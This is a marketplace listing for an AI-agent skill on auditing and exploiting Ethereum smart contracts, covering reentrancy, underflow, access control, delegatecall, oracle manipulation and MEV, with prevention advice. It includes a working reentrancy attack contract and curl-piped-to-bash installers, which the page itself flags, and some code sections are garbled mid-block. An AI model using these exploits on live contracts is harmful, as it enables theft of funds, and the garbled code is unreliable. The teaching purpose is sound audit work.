AgentStack
SKILL unreviewed MIT Self-run

Exploiting Web3 Smart Contracts

skill-trilwu-secskills-web3-blockchain · by trilwu

Audit and exploit smart contracts and Web3 applications including reentrancy, integer overflow, access control flaws, and DeFi-specific vulnerabilities. Use when testing blockchain applications or performing smart contract audits.

No reviews yet
0 installs
15 views
0.0% view→install

Install

$ agentstack add skill-trilwu-secskills-web3-blockchain

Open-source listing — not yet scanned by AgentStack. Follow the source repository for install instructions.

Security review

⚠ Flagged

1 finding(s); flagged for manual review. · v0.1.0 How review works →

  • Prompt-injection patterns
  • Secret / credential exfiltration
  • Dangerous shell & filesystem operations
  • Untrusted network calls
  • Known-malicious package signatures
  • high Pipes remote content directly into a shell (remote code execution).

What it can access

  • Network access Used
  • Filesystem access No
  • Shell / process execution No
  • Environment & secrets No
  • Dynamic code execution No

From automated source analysis of v0.1.0. “Used” means the capability is present in the source — more access means more to trust, not that it’s unsafe.

Are you the author of Exploiting Web3 Smart Contracts? Claim this listing to set pricing, connect Stripe payouts, and keep 70% of every sale.
Sign up to claim

About

Exploiting Web3 and Smart Contracts

When to Use

  • Smart contract security auditing
  • DeFi protocol testing
  • Web3 application pentesting
  • Blockchain vulnerability assessment
  • NFT platform security

Environment Setup

Install Tools:

# Node.js and npm
curl -fsSL https://deb.nodesource.com/setup_18.x | sudo -E bash -
sudo apt install -y nodejs

# Hardhat (Ethereum development)
npm install --save-dev hardhat

# Foundry (Rust-based toolkit)
curl -L https://foundry.paradigm.xyz | bash
foundryup

# Slither (static analysis)
pip3 install slither-analyzer

# Mythril (security analysis)
pip3 install mythril

Connect to Networks:

// Ethereum Mainnet via Infura
const Web3 = require('web3');
const web3 = new Web3('https://mainnet.infura.io/v3/YOUR_KEY');

// Local development (Hardhat/Ganache)
const web3 = new Web3('http://127.0.0.1:8545');

Common Smart Contract Vulnerabilities

1. Reentrancy

Vulnerable Contract:

contract Vulnerable {
    mapping(address => uint) public balances;

    function withdraw() public {
        uint amount = balances[msg.sender];
        // Vulnerable: external call before state update
        (bool success,) = msg.sender.call{value: amount}("");
        require(success);
        balances[msg.sender] = 0;  // State update after call
    }
}

Exploit:

contract Attack {
    Vulnerable victim;

    constructor(address _victim) {
        victim = Vulnerable(_victim);
    }

    function attack() public payable {
        victim.deposit{value: 1 ether}();
        victim.withdraw();
    }

    fallback() external payable {
        if (address(victim).balance >= 1 ether) {
            victim.withdraw();  // Reenter
        }
    }
}

Prevention:

  • Checks-Effects-Interactions pattern
  • ReentrancyGuard modifier
  • Use transfer() instead of call()

2. Integer Overflow/Underflow

**Vulnerable (Solidity = 0); // Can underflow balances[msg.sender] -= value; balances[to] += _value; // Can overflow }


**Exploit:**
```solidity
// Send more tokens than you have
// balances[msg.sender] = 1
// _value = 2
// 1 - 2 = 2^256 - 1 (underflow)

Prevention:

  • Use Solidity >= 0.8.0 (automatic checks)
  • Use SafeMath library
  • Manual overflow checks

3. Access Control Issues

Vulnerable:

function withdraw() public {
    // Missing access control!
    msg.sender.transfer(address(this).balance);
}

function setOwner(address _owner) public {
    owner = _owner;  // Anyone can become owner
}

Exploit:

// Call withdraw from any address
await contract.withdraw();

// Become owner
await contract.setOwner(attackerAddress);

Prevention:

modifier onlyOwner() {
    require(msg.sender == owner, "Not owner");
    _;
}

function withdraw() public onlyOwner {
    msg.sender.transfer(address(this).balance);
}

4. Unchecked External Calls

Vulnerable:

function callExternal(address target) public {
    target.call("");  // Return value not checked
}

function sendEther(address payable recipient) public {
    recipient.send(1 ether);  // Silently fails if send() returns false
}

Prevention:

(bool success,) = target.call("");
require(success, "Call failed");

5. Delegatecall Injection

Vulnerable:

function forward(address _target, bytes memory _data) public {
    _target.delegatecall(_data);  // Executes in contract's context
}

Exploit:

// Attacker can modify contract storage
// Call selfdestruct()
// Change owner

Prevention:

  • Avoid delegatecall to user-controlled addresses
  • Whitelist allowed targets
  • Use libraries instead

6. Front-Running / MEV

Scenario:

// DEX swap at specific price
function swap(uint256 amountIn) public {
    uint256 amountOut = getAmountOut(amountIn);
    // Attacker sees this in mempool
    // Submits transaction with higher gas to execute first
    // Changes the price before victim's tx
}

MEV Attacks:

  • Front-running
  • Back-running
  • Sandwich attacks
  • Liquidations
  • Arbitrage

Mitigation:

  • Commit-reveal schemes
  • Private mempools (Flashbots)
  • Slippage protection
  • Minimal on-chain disclosure

7. Price Oracle Manipulation

Vulnerable:

// Using single DEX as price source
function getPrice() public view returns (uint256) {
    return uniswapPair.getReserves();
}

Exploit:

// Flash loan attack
// 1. Borrow large amount
// 2. Manipulate DEX price
// 3. Interact with vulnerable contract
// 4. Repay flash loan
// 5. Profit

Prevention:

  • Use time-weighted average price (TWAP)
  • Multiple oracle sources (Chainlink)
  • Delay price updates
  • Min/max price bounds

8. Denial of Service

Vulnerable:

function distribute() public {
    for (uint i = 0; i  {
    console.log(`Transfer: ${from} -> ${to}: ${amount}`);
});

// Past events
const events = await contract.queryFilter("Transfer", fromBlock, toBlock);

NFT-Specific Vulnerabilities

Metadata Manipulation:

  • Centralized metadata storage
  • Mutable tokenURI
  • IPFS pinning issues

Minting Exploits:

// Reentrancy in minting
function mint() external payable {
    require(msg.value == price);
    (bool success,) = owner.call{value: msg.value}("");  // Vulnerable
    _mint(msg.sender, tokenId++);
}

Royalty Bypass:

  • Direct NFT transfers
  • Bypassing marketplace fees
  • Washing trades

Testing on Mainnet Fork

Hardhat:

// hardhat.config.js
module.exports = {
  networks: {
    hardhat: {
      forking: {
        url: "https://eth-mainnet.alchemyapi.io/v2/YOUR_KEY",
        blockNumber: 14000000
      }
    }
  }
};

Foundry:

# Fork mainnet
forge test --fork-url https://eth-mainnet.alchemyapi.io/v2/YOUR_KEY

# Specific block
forge test --fork-url https://... --fork-block-number 14000000

Tools Summary

Analysis:

  • Slither - Static analyzer
  • Mythril - Security scanner
  • Manticore - Symbolic execution
  • Echidna - Fuzzer

Development:

  • Hardhat - Development environment
  • Foundry - Rust-based toolkit
  • Remix - Online IDE
  • Truffle - Development framework

Monitoring:

  • Etherscan - Block explorer
  • Tenderly - Debugging platform
  • OpenZeppelin Defender - Security monitoring

Security Best Practices

  1. Use latest Solidity (>= 0.8.0)
  2. Follow Checks-Effects-Interactions pattern
  3. Limit external calls
  4. Validate all inputs
  5. Use established libraries (OpenZeppelin)
  6. Implement access control
  7. Add emergency pause
  8. Get professional audits
  9. Use testnets extensively
  10. Monitor contracts post-deployment

References

  • https://book.hacktricks.xyz/blockchain
  • https://consensys.github.io/smart-contract-best-practices/
  • https://github.com/crytic/building-secure-contracts
  • https://github.com/OpenZeppelin/openzeppelin-contracts
  • https://ethernaut.openzeppelin.com/ (CTF)

Source & license

This open-source skill is cataloged on AgentStack and links to its original source — we do not rehost the code.

Install and usage instructions live in the source repository linked above.

Reviews

No reviews yet — be the first.

Versions

  • v0.1.0 Imported from the upstream source.